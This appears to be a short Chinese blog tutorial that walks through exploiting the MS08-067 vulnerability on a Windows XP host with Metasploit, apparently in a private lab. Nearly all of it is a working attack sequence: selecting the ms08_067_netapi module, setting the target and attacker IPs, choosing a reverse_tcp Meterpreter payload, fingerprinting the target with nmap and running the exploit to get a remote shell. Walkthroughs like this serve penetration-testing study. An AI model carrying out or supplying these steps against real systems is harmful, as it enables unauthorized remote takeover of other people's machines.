Metasploit远程代码执行

Metasploit之远程代码执行

本次漏洞利用的是ms08-067的XP漏洞

metasploit下进行操作


search 08-067            -->搜索漏洞相关的模块,得到exploit/windows/smb/ms08_067_netapi

Metasploit远程代码执行_第1张图片

use exploit/windows/smb/ms08_067_netapi        -->使用这个漏洞模块

show options             -->查看设置选项

Metasploit远程代码执行_第2张图片

set RHOST 192.168.4.160 -->设置你要攻击目标192.168.4.160
show payloads            -->查看载荷

set payload windows/meterpreter/reverse_tcp    -->使用这个载荷

Metasploit远程代码执行_第3张图片

show options             -->查看配置选项

set LHOST                -->设置攻击者的IP,这里我的设置:set LHOST 192.168.253.129

info                     -->查看该漏洞可以利用的针对系统,或者命令:show targets

nmap -O 192.168.4.160   -->扫描查看我们的目标主机的信息,得:Microsoft Windows XP SP3

show target id           -->知道对应的系统版本就直接设置,这里的“id”应该是对应的数字

show options             -->设置好以后的最后一遍检查



exploit                  -->执行攻击,若成功攻击即可得到meterpreter的反弹shell

你可能感兴趣的:(Metasploit远程代码执行)